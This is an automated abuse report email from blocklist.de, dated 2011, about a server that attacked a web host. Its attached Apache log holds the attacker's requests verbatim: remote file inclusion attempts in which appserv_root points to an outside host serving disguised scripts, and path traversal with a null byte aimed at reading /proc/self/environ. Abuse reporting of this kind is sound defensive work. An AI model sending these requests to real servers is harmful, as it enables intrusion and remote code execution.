Return-Path: <autogenerated@blocklist.de>
X-Original-To: gesendet@abuse.customer-config.de
Delivered-To: gesendet@abuse.customer-config.de
Received: by server5.customer-config.de (Postfix, from userid 0)
	id 99D0A18018EB; Thu, 24 Mar 2011 14:22:09 +0100 (CET)
To: "abuse@xxx.tld" <abuse@xxxx.tld>
Subject: [noreply] abuse report about 82.1xx.xx.xxx - Thu, 24 Mar 2011 14:21:53 +0100 -- service: rfi-attack (First x 1) RID: 816068
MIME-Version: 1.0
Reply-To: "Abuse-Team" <xx@blocklist.de>
From: "Abuse-Team (auto-generated)" <autogenerated@blocklist.de>
Sender: xx@blocklist.de
X-Mailer: blocklist.de
Errors-To: autogenerated@blocklist.de
Auto-Submitted: auto-generated
Content-Transfer-Encoding: 7bit
Content-Type: multipart/mixed; 
	 boundary="Abuse-5f7d1cd5efcad5ef7e76d82889637d2f";
X-Arf: yes
X-Report-ID: 816068 
Message-Id: <20110324132209.99D0A18018EB@server5.customer-config.de>
Date: Thu, 24 Mar 2011 14:22:09 +0100 (CET)


--Abuse-5f7d1cd5efcad5ef7e76d82889637d2f
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Type: text/plain; charset=utf8;

Hello Abuse-Team,

your Server with the IP: 82.1xx.xx.xxx has attacked one of our server/partner on the service:
"rfi-attack"  on Time: Thu, 24 Mar 2011 14:21:53 +0100.
The IP was automatically blocked for more than 10 minutes. To block an IP, it needs 
3 failed Logins, one match for "invalid user" or a 5xx-Error-Code (eg. Blacklist)!

Please check the machine behind the IP 82.1xx.xx.xxx (server.xxx.com) and fix the problem.
Search for AS-Number/IPs from you, look at http://www.blocklist.de/en/search.html?as=29650  

You can parse this Mail with X-ARF-Tools from http://www.x-arf.org/tools.html e.g. validatexarf-php.tar.gz.
You found more Information about X-Arf under http://www.x-arf.org/specification.html

This mail will be resend after one day if more attacks are recognized.
In the attachment of this mail you can find the original protocols of our systems.

To pause this message for one week, you can insert the IP and E-Mailaddress to our Blocklist.
If more attacks of your network are recognized after the pause of seven days, the block will 
be canceled and you will get new reports.

http://www.blocklist.de/en/search.html?ip=82.1xx.xx.xxx&email=abuse@xxx.tld

We found your address in the Whois-Data from the IP under the SearchString "abuse-mailbox"
Answer us to rewrite the address (to abuse-quiet or a special address) for all upcoming reports.
 

------------------------------
Abuse-Team
This message was sent automatically, please answer us for Questions
or go to: http://www.blocklist.de/en/contact.html
------------------------------

--Abuse-5f7d1cd5efcad5ef7e76d82889637d2f
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Type: text/plain; charset=utf8; name="report.txt";

---
Reported-From: autogenerated@blocklist.de
Category: abuse
Report-Type: login-attack
Service: rfi-attack
Version: 0.1
User-Agent: Fail2BanFeedBackScript blocklist.de V0.1
Date: Thu, 24 Mar 2011 14:21:53 +0100
Source-Type: ip-address
Source: 82.1xx.xx.xxx
Port: 80
Report-ID: 816068@blocklist.de
Schema-URL: http://www.x-arf.org/schema/abuse_login-attack_0.1.1.json
Attachment: text/plain

--Abuse-5f7d1cd5efcad5ef7e76d82889637d2f
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Type: text/plain; charset=utf8; name="logfile.log";

Timezone +0100 (CET)
Lines containing IP:82.1xx.xx.xxx in /var/log/apache/pucorp.org.log

82.1xx.xx.xxx - - [22/Mar/2011:10:36:40 +0100] "GET //appserv/main.php?appserv_root=test?? HTTP/1.1" 200 160886 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
82.1xx.xx.xxx - - [22/Mar/2011:10:36:41 +0100] "GET //appserv/main.php?appserv_root=hxxp://www.faclip.ir/shop/n0x2.jpg?? HTTP/1.1" 500 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
82.1xx.xx.xxx - - [22/Mar/2011:10:36:46 +0100] "GET //appserv/main.php?appserv_root=hxxp://www.faclip.ir/shop/n0x3.jpg?? HTTP/1.1" 500 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
82.1xx.xx.xxx - - [22/Mar/2011:10:44:58 +0100] "GET //appserv/main.php?appserv_root=test?? HTTP/1.1" 200 160888 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
82.1xx.xx.xxx - - [22/Mar/2011:10:44:59 +0100] "GET //appserv/main.php?appserv_root=hxxp://www.faclip.ir/shop/n0x2.jpg?? HTTP/1.1" 200 153691 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
82.1xx.xx.xxx - - [22/Mar/2011:10:45:00 +0100] "GET //appserv/main.php?appserv_root=hxxp://www.faclip.ir/shop/n0x3.jpg?? HTTP/1.1" 200 168213 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
82.1xx.xx.xxx - - [22/Mar/2011:10:48:52 +0100] "GET //appserv/main.php?appserv_root=test?? HTTP/1.1" 200 160888 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
82.1xx.xx.xxx - - [22/Mar/2011:10:48:53 +0100] "GET //appserv/main.php?appserv_root=hxxp://www.faclip.ir/shop/n0x2.jpg?? HTTP/1.1" 200 153693 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
82.1xx.xx.xxx - - [22/Mar/2011:10:48:54 +0100] "GET //appserv/main.php?appserv_root=hxxp://www.faclip.ir/shop/n0x3.jpg?? HTTP/1.1" 200 168213 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
82.1xx.xx.xxx - - [22/Mar/2011:10:48:57 +0100] "GET //appserv/main.php?appserv_root=test?? HTTP/1.1" 200 160888 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
82.1xx.xx.xxx - - [22/Mar/2011:10:48:58 +0100] "GET //appserv/main.php?appserv_root=hxxp://www.faclip.ir/shop/n0x2.jpg?? HTTP/1.1" 200 153693 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
82.1xx.xx.xxx - - [22/Mar/2011:10:48:59 +0100] "GET //appserv/main.php?appserv_root=hxxp://www.faclip.ir/shop/n0x3.jpg?? HTTP/1.1" 200 168213 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
82.1xx.xx.xxx - - [22/Mar/2011:11:32:09 +0100] "GET //appserv/main.php?appserv_root=test?? HTTP/1.1" 200 160888 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
82.1xx.xx.xxx - - [22/Mar/2011:11:32:10 +0100] "GET //appserv/main.php?appserv_root=hxxp://www.faclip.ir/shop/n0x2.jpg?? HTTP/1.1" 200 153693 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
82.1xx.xx.xxx - - [22/Mar/2011:11:32:11 +0100] "GET //appserv/main.php?appserv_root=hxxp://www.faclip.ir/shop/n0x3.jpg?? HTTP/1.1" 200 168213 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
82.1xx.xx.xxx - - [22/Mar/2011:11:32:21 +0100] "GET //appserv/main.php?appserv_root=test?? HTTP/1.1" 200 160873 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
82.1xx.xx.xxx - - [22/Mar/2011:11:32:22 +0100] "GET //appserv/main.php?appserv_root=hxxp://www.faclip.ir/shop/n0x2.jpg?? HTTP/1.1" 200 153693 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
82.1xx.xx.xxx - - [22/Mar/2011:11:32:24 +0100] "GET //appserv/main.php?appserv_root=hxxp://www.faclip.ir/shop/n0x3.jpg?? HTTP/1.1" 200 168213 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
82.1xx.xx.xxx - - [22/Mar/2011:11:38:01 +0100] "GET //appserv/main.php?appserv_root=test?? HTTP/1.1" 200 160886 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
82.1xx.xx.xxx - - [22/Mar/2011:11:38:03 +0100] "GET //appserv/main.php?appserv_root=hxxp://www.faclip.ir/shop/n0x2.jpg?? HTTP/1.1" 200 153693 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
82.1xx.xx.xxx - - [22/Mar/2011:11:38:04 +0100] "GET //appserv/main.php?appserv_root=hxxp://www.faclip.ir/shop/n0x3.jpg?? HTTP/1.1" 200 168213 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
82.1xx.xx.xxx - - [22/Mar/2011:11:38:45 +0100] "GET //appserv/main.php?appserv_root=test?? HTTP/1.1" 200 160888 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
82.1xx.xx.xxx - - [22/Mar/2011:11:38:46 +0100] "GET //appserv/main.php?appserv_root=hxxp://www.faclip.ir/shop/n0x2.jpg?? HTTP/1.1" 200 153693 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
82.1xx.xx.xxx - - [22/Mar/2011:11:38:48 +0100] "GET //appserv/main.php?appserv_root=hxxp://www.faclip.ir/shop/n0x3.jpg?? HTTP/1.1" 200 168213 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
82.1xx.xx.xxx - - [22/Mar/2011:11:39:36 +0100] "GET //appserv/main.php?appserv_root=test?? HTTP/1.1" 200 160888 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
82.1xx.xx.xxx - - [22/Mar/2011:11:39:37 +0100] "GET //appserv/main.php?appserv_root=hxxp://www.faclip.ir/shop/n0x2.jpg?? HTTP/1.1" 200 153693 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
82.1xx.xx.xxx - - [22/Mar/2011:11:39:38 +0100] "GET //appserv/main.php?appserv_root=hxxp://www.faclip.ir/shop/n0x3.jpg?? HTTP/1.1" 200 168213 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
82.1xx.xx.xxx - - [22/Mar/2011:11:41:57 +0100] "GET //appserv/main.php?appserv_root=test?? HTTP/1.1" 200 160888 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
82.1xx.xx.xxx - - [22/Mar/2011:11:41:58 +0100] "GET //appserv/main.php?appserv_root=hxxp://www.faclip.ir/shop/n0x2.jpg?? HTTP/1.1" 200 153693 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
82.1xx.xx.xxx - - [22/Mar/2011:11:41:59 +0100] "GET //appserv/main.php?appserv_root=hxxp://www.faclip.ir/shop/n0x3.jpg?? HTTP/1.1" 200 168212 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
82.1xx.xx.xxx - - [24/Mar/2011:14:20:33 +0100] "GET //index2.php?option=com_rwcards&controller=../../../../../../../../../../../../..//proc/self/environ%0000 HTTP/1.1" 200 151342 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
82.1xx.xx.xxx - - [24/Mar/2011:14:21:53 +0100] "GET //index2.php?option=com_rwcards&controller=../../../../../../../../../../../../..//proc/self/environ%0000 HTTP/1.1" 200 152246 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"



--Abuse-5f7d1cd5efcad5ef7e76d82889637d2f--